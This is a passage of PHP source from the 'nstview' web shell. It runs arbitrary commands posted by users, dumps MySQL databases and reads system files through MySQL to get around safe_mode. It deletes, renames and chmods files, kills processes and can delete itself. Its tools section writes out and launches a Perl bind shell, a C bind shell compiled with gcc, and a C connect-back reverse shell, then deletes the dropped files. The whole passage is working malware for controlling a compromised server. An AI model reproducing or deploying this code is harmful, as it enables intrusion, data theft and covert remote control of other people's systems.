  689. fwrite($fp, $row[1].";\r\n\r\n");
  690. $res = mysql_query("SELECT * FROM `$tab`");
  691. if(mysql_num_rows($res)>0){
  692. while($row=mysql_fetch_assoc($res)){
  693. $keys = join("`, `", array_keys($row));
  694. $values = array_values($row);
  695. foreach($values as $k=>$v) {$values[$k] = adds2($v);}
  696. $values = join("', '", $values);
  697. $sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
  698. fwrite($fp, $sql);
  699. }}
  700. fwrite($fp, "\r\n\r\n\r\n");
  701. }
  702. fclose($fp);
  703. print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
  704. }
  705.  
  706.  
  707.  
  708.  
  709.  
  710.  
  711. $vnutr=$_GET['vnutr'];
  712. $tbl=$_GET['tbl'];
  713. if($vnutr and !$_GET['ins_new_line']){
  714. print "<table cellpadding=0 cellspacing=1><tr><td>";
  715.  
  716. mysql_select_db($db) or die(mysql_error());
  717. $c=mysql_query ("SELECT COUNT(*) FROM $tbl");
  718. $cfa=mysql_fetch_array($c);
  719. mysql_free_result($c);
  720. print "
  721. Total: $cfa[0]
  722. <form>
  723. From: <input name=from size=3 value=0>
  724. To: <input name=to size=3 value='$cfa[0]'>
  725. <input type=submit name=show value=Show>
  726. <input type=hidden name=vnutr value=1>
  727. <input type=hidden name=vn value='$vn'>
  728. <input type=hidden name=db value='$db'>
  729. <input type=hidden name=login value='$login'>
  730. <input type=hidden name=pass value='$pass'>
  731. <input type=hidden name=adress value='$adress'>
  732. <input type=hidden name=conn value=1>
  733. <input type=hidden name=baza value=1>
  734. <input type=hidden name=p value=sql>
  735. <input type=hidden name=tbl value='$tbl'>
  736. [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
  737. </form></td></tr></table>";
  738. $vn=$_GET['vn'];
  739. $from=$_GET['from'];
  740. $to=$_GET['to'];
  741. $from=$_GET['from'];
  742. $to=$_GET['to'];
  743. if(!isset($from)){$from=0;}
  744. if(!isset($to)){$to=50;}
  745. $query = "SELECT * FROM $vn LIMIT $from,$to";
  746. $result = mysql_query($query);
  747. $result1= mysql_query($query);
  748. print $del_result;
  749. print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
  750. for ($i=0;$i<mysql_num_fields($result);$i++){
  751. $name=mysql_field_name($result,$i);
  752. $type  = mysql_field_type($result, $i);
  753. $len  = mysql_field_len($result, $i);
  754. print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
  755. }
  756. print "</tr><pre>";
  757.  
  758. while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
  759. foreach($mn as $key=>$inside){
  760. $buffer1 .= "`$key`='".adds($inside)."' AND ";
  761. $b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
  762. }
  763. $buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
  764. $buffer1  = base64_encode($buffer1);
  765. print "<td>
  766. <form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
  767. <input type=hidden name=delete_row value='$buffer1'>
  768. <input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
  769. </form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
  770. <input type=hidden name=edit_row value='$buffer1'>
  771. <input type=submit value=Edit style='border:1px;background-color:green;'>
  772. </form>
  773. </td>\r\n";
  774. print $b1;
  775. print "</tr>";
  776. unset($b1);
  777. unset($buffer1);
  778. }
  779.  
  780.  
  781.  
  782. mysql_free_result($result);
  783. print "</table>";
  784. } #end vnutr
  785. print "</td></tr></table>";
  786. }
  787.  
  788.  
  789.  
  790. print "</tr></td></table> </td></tr></table>";
  791. print $copyr;
  792. die;
  793. }
  794.  
  795.  
  796. @$p=$_GET['p'];
  797. if(@$_GET['p']=="selfremover"){
  798.         print "<tr><td>";
  799. print "<font color=red face=verdana size=1>Are you sure?<br>
  800. <a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
  801. Remove: <u>";
  802. $path=__FILE__;
  803. print $path;
  804. print " </u>?</td></tr></table>";
  805. die;
  806. }
  807.  
  808. if($p=="yes"){
  809. $path=__FILE__;
  810. @unlink($path);
  811. $path=str_replace("\\","/",$path);
  812. if(file_exists($path)){$hmm="NOT DELETED!!!";
  813. print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
  814. }else{$hmm="DELETED";}
  815. print "<script>alert('$path $hmm');</script>";
  816.  
  817. }
  818.  
  819.  
  820.  
  821. if($os=="unix"){
  822. function fastcmd(){
  823. global $fast_commands;
  824. $c_f=explode("\n",$fast_commands);
  825. $c_f=count($c_f)-2;
  826. print "
  827. <form method=post>
  828. Total commands: $c_f<br>
  829. <select name=sh3>";
  830.  
  831. $c=substr_count($fast_commands," (nst) ");
  832. for($i=0; $i<=$c; $i++){
  833.        $expl2=explode("\r\n",$fast_commands);
  834.         $expl=explode(" (nst) ",$expl2[$i]);
  835.         if(trim($expl[1])!=""){
  836.         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
  837.    }
  838. }
  839.  
  840. print "</select><br>
  841. <input type=submit value=Exec>
  842. </form>
  843. ";
  844. }
  845. }
  846.  
  847.  
  848. if($os=="win"){
  849. function fastcmd(){
  850. global $fast_commands_win;
  851. $c_f=explode("\n",$fast_commands_win);
  852. $c_f=count($c_f)-2;
  853. print "
  854. <form method=post>
  855. Total commands: $c_f<br>
  856. <select name=sh3>";
  857.  
  858. $c=substr_count($fast_commands_win," (nst) ");
  859. for($i=0; $i<=$c; $i++){
  860.        $expl2=explode("\r\n",$fast_commands_win);
  861.         $expl=explode(" (nst) ",$expl2[$i]);
  862.         if(trim($expl[1])!=""){
  863.         print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
  864.    }
  865. }
  866.  
  867. print "</select><br>
  868. <input type=submit value=Exec>
  869. </form>
  870. ";
  871. }
  872. }
  873.  
  874.  
  875. echo "
  876. <tr><td>";
  877. if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
  878. ";
  879. chdir($d);
  880. echo getcwd()."<br><br>
  881. Fast cmd:<br>";
  882. fastcmd();
  883. if($os=="win"){$d=str_replace("/","\\\\",$d);}
  884. print "
  885. <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
  886. <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
  887. ";
  888. if(@$_POST['sh3']){
  889. $sh3=$_POST['sh3'];
  890. echo "<pre>";
  891. print `$sh3`;
  892. echo "</pre>";
  893. }
  894. }
  895.  
  896. if(@$_GET['sh311']=="2"){
  897. echo "<center>cmd<br>
  898. pwd:
  899. ";
  900. chdir($d);
  901. echo getcwd()."<br><br>
  902. Fast cmd:<br>";
  903. fastcmd();
  904. if($os=="win"){$d=str_replace("/","\\\\",$d);}
  905. print "
  906. <a href=\"javascript:cwd('$d ')\">Insert pwd</a>
  907. <form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
  908. if(@$_POST['sh3']){
  909. $sh3=$_POST['sh3'];
  910. echo "<pre>"; print `$sh3`; echo "</pre>";}
  911. echo $copyr;
  912. exit;}
  913.  
  914. if(@$_GET['delfl']){
  915. @$delfolder=$_GET['delfolder'];
  916. echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
  917. (All files must be writable)<br>
  918. <a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
  919. ";
  920. echo $copyr;
  921. exit;
  922. }
  923.  
  924.  
  925. $mkdir=$_GET['mkdir'];
  926. if($mkdir){
  927. print "<br><b>Create Folder in $d :</b><br><br>
  928. <form method=post>
  929. New folder name:<br>
  930. <input name=dir_n size=30>
  931. </form><br>
  932. ";
  933. if($_POST['dir_n']){
  934. mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
  935. print "<b><font color=green>Directory created success!</font></b>";
  936. }
  937. print $copyr;
  938. die;
  939. }
  940.  
  941.  
  942. $mkfile=$_GET['mkfile'];
  943. if($mkfile){
  944. print "<br><b>Create file in $d :</b><br><br>
  945. <form method=post>
  946. File name:<br>
  947. (example: hello.txt , hello.php)<br>
  948. <input name=file_n size=30>
  949. </form><br>
  950. ";
  951. if($_POST['file_n']){
  952. $fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
  953. fwrite($fp,"");
  954. print "<b><font color=green>File created success!</font></b>";
  955. }
  956. print $copyr;
  957. die;
  958. }
  959.  
  960.  
  961. $ps_table=$_GET['ps_table'];
  962. if($ps_table){
  963.  
  964. if($_POST['kill_p']){
  965. exec("kill -9 ".$_POST['kill_p']);
  966. }
  967.  
  968. $str=`ps aux`;
  969.  
  970.  
  971. preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
  972.  
  973.  
  974. print "<br><b>PS Table :: Fast kill program<br>
  975. (p.s: Tested on Linux slackware 10.0)<br>
  976. <br></b>";
  977. print "<center><table border=1>";
  978. for($i=0; $i<count($matches[3]); $i++){
  979. $expl=explode(" ",$matches[0][$i]);
  980. print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
  981. }#end of for
  982. print "</table></center><br><br>";
  983. unset($str);
  984. print $copyr;
  985. die;
  986. }#end of ps table
  987.  
  988.  
  989. $read_file_safe_mode=$_GET['read_file_safe_mode'];
  990. if($read_file_safe_mode){
  991.  
  992. if(!isset($_POST['l'])){$_POST['l']="root";}
  993.  
  994. print "<br>
  995. Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
  996. <form method=post>
  997. <table>
  998. <tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
  999. <tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
  1000. <tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
  1001. (example: /etc/hosts)<br>
  1002. <input name=read_file size=45><br>
  1003. <input type=submit value='Show content'>
  1004. </form>
  1005. <br>";
  1006.  
  1007. if($_POST['read_file']){
  1008. $read_file=$_POST['read_file'];
  1009. @mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
  1010. mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
  1011. mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
  1012. mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
  1013. mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
  1014. $query = "SELECT * FROM tmp_file";
  1015. $result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
  1016. print "<b>File content</b>:<br><br>";
  1017. for($i=0;$i<mysql_num_fields($result);$i++){
  1018. $name=mysql_field_name($result,$i);}
  1019. while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
  1020. foreach ($line as $key =>$col_value) {
  1021. print htmlspecialchars($col_value)."<br>";}}
  1022. mysql_free_result($result);
  1023. mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
  1024. }
  1025.  
  1026.  
  1027. print $copyr;
  1028. die;
  1029. }
  1030.  
  1031.  
  1032.  
  1033. $wich_f=$_GET['wich_f'];
  1034. $delete=$_GET['delete'];
  1035. $del_f=$_GET['del_f'];
  1036. $chmod=$_GET['chmod'];
  1037. $ccopy_to=$_GET['ccopy_to'];
  1038.  
  1039.  
  1040.  
  1041. if(@$_GET['del_f']){
  1042. if(!isset($delete)){
  1043. print "<font color=red>Delete this file?</font><br>
  1044. <b>$d/$wich_f<br><br></b>
  1045. <a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
  1046. ";}
  1047. if($delete==1){
  1048. unlink($d."/".$del_f);
  1049. print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
  1050. <br><b> <a href='$php_self?d=$d'># BACK</a>
  1051. ";
  1052. }
  1053. echo $copyr;
  1054. exit;
  1055. }
  1056.  
  1057.  
  1058.  
  1059. if($ccopy_to){
  1060. $wich_f=$_POST['wich_f'];
  1061. $to_f=$_POST['to_f'];
  1062. print "<font color=green>Copy file:<br>
  1063. $d/$ccopy_to</font><br>
  1064. <br>
  1065. <form method=post>
  1066. File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
  1067. To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
  1068. <input type=submit value=Copy></form><br><br>
  1069. ";
  1070.  
  1071. if($to_f){
  1072. @copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
  1073. print "<font color=green><b>Copy success!!!</b></font><br>";
  1074. }
  1075.  
  1076. echo $copyr;
  1077. exit;
  1078. }
  1079.  
  1080.  
  1081.  
  1082. if(@$_GET['chmod']){
  1083. $perms = @fileperms($d."/".$wich_f);
  1084. print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
  1085. <br><center>This file chmod is</b> ";
  1086. print perm($perms);
  1087. print "</center>
  1088. <br>";
  1089. $chmd=<<<HTML
  1090.  
  1091. <script>
  1092. <!--
  1093.  
  1094. function do_chmod(user) {
  1095.         var field4 = user + "4";
  1096.         var field2 = user + "2";
  1097.         var field1 = user + "1";
  1098.         var total = "t_" + user;
  1099.         var symbolic = "sym_" + user;
  1100.         var number = 0;
  1101.         var sym_string = "";
  1102.  
  1103.         if (document.chmod[field4].checked == true) { number += 4; }
  1104.         if (document.chmod[field2].checked == true) { number += 2; }
  1105.         if (document.chmod[field1].checked == true) { number += 1; }
  1106.  
  1107.         if (document.chmod[field4].checked == true) {
  1108.                 sym_string += "r";
  1109.         } else {
  1110.                 sym_string += "-";
  1111.         }
  1112.         if (document.chmod[field2].checked == true) {
  1113.                 sym_string += "w";
  1114.         } else {
  1115.                 sym_string += "-";
  1116.         }
  1117.         if (document.chmod[field1].checked == true) {
  1118.                 sym_string += "x";
  1119.         } else {
  1120.                 sym_string += "-";
  1121.         }
  1122.  
  1123.         if (number == 0) { number = ""; }
  1124.         document.chmod[total].value = number;
  1125.         document.chmod[symbolic].value = sym_string;
  1126.  
  1127.         document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
  1128.         document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
  1129. }
  1130. //-->
  1131. </script>
  1132.  
  1133.  
  1134.  
  1135. <form name="chmod" method=post>
  1136. <p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
  1137.         <tr bgcolor="gray">
  1138.                 <td align="left"><b>Permission</b></td>
  1139.                 <td align="center"><b>Owner</b></td>
  1140.                 <td align="center"><b>Group</b></td>
  1141.                 <td align="center"><b>Other</b></td>
  1142.                 <td bgcolor="#dddddd" rowspan="4"> </td>
  1143.         </tr><tr bgcolor="#dddddd">
  1144.                 <td align="left" nowrap><b>Read</b></td>
  1145.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
  1146.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
  1147.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
  1148.         </tr><tr bgcolor="#dddddd">
  1149.                 <td align="left" nowrap><b>Write</b></td>
  1150.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
  1151.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
  1152.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
  1153.         </tr><tr bgcolor="#dddddd">
  1154.                 <td align="left" nowrap><b>Execute</b></td>
  1155.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
  1156.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
  1157.                 <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
  1158.         </tr><tr bgcolor="#dddddd">
  1159.                 <td align="right" nowrap>Octal:</td>
  1160.                 <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
  1161.                 <td align="center"><input type="text" name="t_group" value="" size="1"></td>
  1162.                 <td align="center"><input type="text" name="t_other" value="" size="1"></td>
  1163.                 <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
  1164.         </tr><tr bgcolor="#dddddd">
  1165.                 <td align="right" nowrap>Symbolic:</td>
  1166.                 <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
  1167.                 <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
  1168.                 <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
  1169.                 <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
  1170.         </tr>
  1171. </table></td></tr></table></p>
  1172. HTML;
  1173.  
  1174. print "<center>".$chmd."
  1175.  
  1176. <b>$d/$wich_f</b><br><br>
  1177. <input type=submit value=CHMOD></form>
  1178. </center>
  1179. </form>
  1180. ";
  1181. $t_total=$_POST['t_total'];
  1182. if($t_total){
  1183. chmod($d."/".$wich_f,$t_total);
  1184. print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
  1185. print "<a href='$php_self?d=$d'># BACK</a><br><br>";
  1186. }
  1187. echo $copyr;
  1188. exit;
  1189. }
  1190.  
  1191.  
  1192. if(@$_GET['rename']){
  1193. print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
  1194. <center>
  1195. <form method=post>
  1196. <b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
  1197. <input name=rto size=40 value='$wich_f'><br><br>
  1198. <input type=submit value=RENAME>
  1199. </form>
  1200. ";
  1201.  
  1202. @$rto=$_POST['rto'];
  1203.  
  1204. if($rto){
  1205. $fr1=$d."/".$wich_f;
  1206. $fr1=str_replace("//","/",$fr1);
  1207. $to1=$d."/".$rto;
  1208. $to1=str_replace("//","/",$to1);
  1209.  
  1210. rename($fr1,$to1);
  1211. print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
  1212.  
  1213. echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
  1214.  
  1215. }
  1216.  
  1217. echo $copyr;
  1218. exit;
  1219. }
  1220.  
  1221.  
  1222.  
  1223.  
  1224. if(@$_GET['deldir']){
  1225. @$dir=$_GET['dir'];
  1226. function deldir($dir)
  1227. {
  1228. $handle = @opendir($dir);
  1229. while (false!==($ff = @readdir($handle))){
  1230. if($ff != "." && $ff != ".."){
  1231. if(@is_dir("$dir/$ff")){
  1232. deldir("$dir/$ff");
  1233. }else{
  1234. @unlink("$dir/$ff");
  1235. }}}
  1236. @closedir($handle);
  1237. if(@rmdir($dir)){
  1238. @$success = true;}
  1239. return @$success;
  1240. }
  1241. $dir=@$dir;
  1242. deldir($dir);
  1243.  
  1244. $rback=$_GET['rback'];
  1245. @$rback=explode("/",$rback);
  1246. $crb=count($rback);
  1247. for($i=0; $i<$crb-1; $i++){
  1248.         @$x.=$rback[$i]."/";
  1249. }
  1250. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
  1251. echo $copyr;
  1252. exit;}
  1253.  
  1254.  
  1255. if(@$_GET['t']=="tools"){
  1256.         # unix
  1257. if($os=="unix"){
  1258. print "
  1259. <center><br>
  1260. <font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
  1261. <table border=1>
  1262. <tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
  1263. <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
  1264. <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
  1265. <tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
  1266. <tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
  1267. <tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
  1268. <tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
  1269. </table>
  1270. </center>
  1271. <br><Br>
  1272. ";
  1273. }#end of unix
  1274.  
  1275.  
  1276. if($_POST['perl_bd']){
  1277. $port=$_POST['port'];
  1278. $perl_bd_scp = "
  1279. use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  1280. setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
  1281. listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
  1282. open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
  1283. close X;}}";
  1284.  
  1285. if(is_writable("/tmp")){
  1286. $fp=fopen("/tmp/nst_perl_bd.pl","w");
  1287. fwrite($fp,"$perl_bd_scp");
  1288. passthru("nohup perl /tmp/nst_perl_bd.pl &");
  1289. unlink("/tmp/nst_perl_bd.pl");
  1290. }else{
  1291. if(is_writable(".")){
  1292. mkdir(".nst_bd_tmp");
  1293. $fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
  1294. fwrite($fp,"$perl_bd_scp");
  1295. passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
  1296. unlink(".nst_bd_tmp/nst_perl_bd.pl");
  1297. rmdir(".nst_bd_tmp");
  1298. }
  1299. }
  1300. $show_ps="1";
  1301. }#end of start perl_bd
  1302.  
  1303. if($_POST['perl_proxy']){
  1304. $port=$_POST['port'];
  1305. $perl_proxy_scp = "";
  1306.  
  1307. if(is_writable("/tmp")){
  1308. $fp=fopen("/tmp/nst_perl_proxy.pl","w");
  1309. fwrite($fp,base64_decode($perl_proxy_scp));
  1310. passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
  1311. unlink("/tmp/nst_perl_proxy.pl");
  1312. }else{
  1313. if(is_writable(".")){
  1314. mkdir(".nst_proxy_tmp");
  1315. $fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
  1316. fwrite($fp,base64_decode($perl_proxy_scp));
  1317. passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
  1318. unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
  1319. rmdir(".nst_proxy_tmp");
  1320. }
  1321. }
  1322. $show_ps="1";
  1323. }
  1324.  
  1325. if($_POST['c_bd']){
  1326. $port=$_POST['port'];
  1327. $c_bd_scp = "#define PORT $port
  1328.  
  1329.  
  1330. int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
  1331. struct sockaddr_in serv_addr;
  1332. struct sockaddr_in client_addr;
  1333.  
  1334. int main ()
  1335. {
  1336.    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  1337.    if (soc_des == -1)
  1338.        exit(-1);
  1339.    bzero((char *) &serv_addr, sizeof(serv_addr));
  1340.    serv_addr.sin_family = AF_INET;
  1341.    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  1342.    serv_addr.sin_port = htons(PORT);
  1343.    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
  1344.    if (soc_rc != 0)
  1345.        exit(-1);
  1346.    if (fork() != 0)
  1347.        exit(0);
  1348.    setpgrp();
  1349.    signal(SIGHUP, SIG_IGN);
  1350.    if (fork() != 0)
  1351.        exit(0);
  1352.    soc_rc = listen(soc_des, 5);
  1353.    if (soc_rc != 0)
  1354.        exit(0);
  1355.    while (1) {
  1356.        soc_len = sizeof(client_addr);
  1357.        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
  1358.        if (soc_cli < 0)
  1359.            exit(0);
  1360.        cli_pid = getpid();
  1361.        server_pid = fork();
  1362.        if (server_pid != 0) {
  1363.            dup2(soc_cli,0);
  1364.            dup2(soc_cli,1);
  1365.            dup2(soc_cli,2);
  1366.            execl(\"/bin/sh\",\"sh\",(char *)0);
  1367.            close(soc_cli);
  1368.            exit(0);
  1369.        }
  1370.    close(soc_cli);
  1371.    }
  1372. }
  1373.  
  1374. ";
  1375.  
  1376.  
  1377. if(is_writable("/tmp")){
  1378. $fp=fopen("/tmp/nst_c_bd.c","w");
  1379. fwrite($fp,"$c_bd_scp");
  1380. passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
  1381. passthru("nohup /tmp/nst_bd &");
  1382. unlink("/tmp/nst_c_bd.c");
  1383. unlink("/tmp/nst_bd");
  1384. }else{
  1385. if(is_writable(".")){
  1386. mkdir(".nst_bd_tmp");
  1387. $fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
  1388. fwrite($fp,"$c_bd_scp");
  1389. passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
  1390. passthru("nohup .nst_bd_tmp/nst_bd &");
  1391. unlink(".nst_bd_tmp/nst_bd");
  1392. unlink(".nst_bd_tmp/nst_c_bd.c");
  1393. rmdir(".nst_bd_tmp");
  1394. }
  1395. }
  1396. $show_ps="1";
  1397. }#end of c bd
  1398.  
  1399.  
  1400. if($_POST['bc_c']){ # nc -l -p 4500
  1401. $port_c = $_POST['port_c'];
  1402. $ip=$_POST['ip'];
  1403. $bc_c_scp = "#include <stdio.h>
  1404.  
  1405.  
  1406. int fd, sock;
  1407. int port = $port_c;
  1408. struct sockaddr_in addr;
  1409.  
  1410. char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
  1411. char shell[] = \"/bin/sh\";
  1412.  
  1413. int main(int argc, char *argv[]) {
  1414.        while(argc<2) {
  1415.        fprintf(stderr, \" %s <ip> \", argv[0]);
  1416.        exit(0); }
  1417.  
  1418. addr.sin_family = AF_INET;
  1419. addr.sin_port = htons(port);
  1420. addr.sin_addr.s_addr = inet_addr(argv[1]);
  1421. fd = socket(AF_INET, SOCK_STREAM, 0);
  1422. connect(fd, (struct sockaddr*)&addr, sizeof(addr));
  1423.  
  1424. send(fd, mesg, sizeof(mesg), 0);
  1425.  
  1426. dup2(fd, 0);
  1427. dup2(fd, 1);
  1428. dup2(fd, 2);
  1429. execl(shell, \"in.telnetd\", 0);
  1430.  
  1431. close(fd);
  1432. return 1;
  1433. }
  1434.  
  1435. ";
  1436.  
  1437. if(is_writable("/tmp")){
  1438. if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
  1439. if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
